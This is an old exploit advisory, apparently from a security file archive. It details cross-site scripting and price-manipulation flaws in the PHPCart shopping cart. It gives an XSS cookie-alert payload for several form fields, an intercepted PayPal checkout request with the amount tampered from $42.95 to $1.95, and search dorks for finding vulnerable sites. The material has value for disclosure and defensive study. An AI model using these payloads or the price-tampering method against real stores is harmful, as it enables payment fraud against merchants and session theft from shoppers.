exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpcart-xss.txt

phpcart-xss.txt
Posted Aug 24, 2008
Authored by h4x0r | Site darkc0de.com

PHPCart versions 3.4 through 4.6.4 suffer from cross site scripting and price manipulation vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | b823a197214e70b1cd37fdbce0f665d00bae6809be37f7bffa34c2415fecf370

phpcart-xss.txt

Change Mirror Download
################################################################ 
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# -d3hydr8 - sinner_01 - baltazar - P47r1ck - C1c4Tr1Z - beenu #
# -rsauron - letsgorun - K1u - DON - OutLawz - MAGE -JeTFyrE #
#-r45c4l -Bond #
################################################################
#
# Author: h4x0r
#
# Home : www.darkc0de.com
#
# Email : vaibhavaher@gmail.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple exploits (XSS & data manipulation) in PHPCart (PHP ECommerce Shopping Cart System ) v3.4 - 4.6.4
#
# Soft.Site: http://phpcart.net/
#
#Exploit 1: XSS
#
# phpCart is a open source web based php shopping cart system integrate for ecommece website. A user can run the #following script in "quantity" feild as # well as "Add Engraving" feild or any other feild where we can maually #inject the script, to get the current cookies.
#
# POC1:- http://www.site.com/phpcart/
# like <script>alert(document.cookie);</script> int the "quantity" feild as well as "Add Engraving" feild or any #other feild, to get the current cookies.
#
# POC2:- http://www.site.com/phpcart/phpcart.php
# Injection of XSS script "Quantity" feild is gives with the XSS attack.
#
# POC3:- http://www.site.com/phpcart/phpcart.php?action=checkout
# Injection of XSS script in input feild like "Name" "Company" "Address, Include City & Prov/State" gives with the #XSS attack.
#
# Live Demo:- http://phpcart.net/demo/phpcart/
#
#
# Exploit 2: Data manipulation
#
#DESCRIPTION:
#A vulnerability in PHPCart, which can be exploited by malicious people to manipulate orders.
#The problem is that the "price" and "postage" parameters are not properly verified in "phpcart.php". This can be #exploited to
#change the price of a product being bought by modifying the "price" parameter directly using a intermediate proxy.
#
#POC:- http://www.site.com/phpcart/phpcart.php
#It was discovered that the main process of online merchant payment was based solely on client-side verification.
#The PHP module (phpcart.php) received the payment amount from the client-side, forwards the amount and sends back
#the total price to the backend server for further payment process.
#There was no proper validation mechanism at the backend to validate the data which had been submitted by the PHP module.
#Potential attackers could tamper the data and modify the total amount.
#Before the transaction enters the merchant gate way we captured the data using intermediate proxy and the total amount shown as $XX as shown was tampered and changed.
#
#POC Example:
#Extract price of purchase:-
#ID Description Price Qty. Amount
#GB1000 Golf Balls - Long Distance 1 $28.95 + $14 shipping charges so total amount is 42.95
#
#Intercept before manipulaion:-
#After the Verification form when the page is redirecting to payment gateway the page is intermediated. The gateway selected is Paypal.
#
#User-Agent: Opera/9.26 (Windows NT 5.1; U; en)
#Host: www.paypal.com
#Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1#
#Accept-Language: en-US,en;q=0.9
#Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
#Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
#Referer: http://www.phpcart.net/demo/phpcart/phpcart.php
#Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=VDrukd29DPvnkTqVFUSeG52gR2iAX22piQHagEGhU
#Cookie2: $Version=1
#Connection: Keep-Alive, TE
#TE: deflate, gzip, chunked, identity, trailers
#Content-Type: application/x-www-form-urlencoded
#Content-Length: 286
#
#cmd=_xclick&upload=1&currency_code=USD&business=sales%40phpcart.net&notify_url=&
#item_name=Shopping+Cart+Order+-+B17B3A57D&return=&cancel_return=&invoice=B17B3A57D&
#firstname=xyz&lastname=qdqd&address1=sfsf&address2=sdfsf&city=sdfsf&state=NE&zip=sfsf&rm=2&amount=42.95&handling_cart=18.00
#
#Here price=42.95 was tampered and manipulated to 1.95
#and u can see that the price on the paypal gateway will be 1.95$.
#
# Live Demo:- http://phpcart.net/demo/phpcart/
#
# Dork:- phpcart/phpcart.php?
# Dork:- Powered by phpCart
#
#
#
################################################################
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close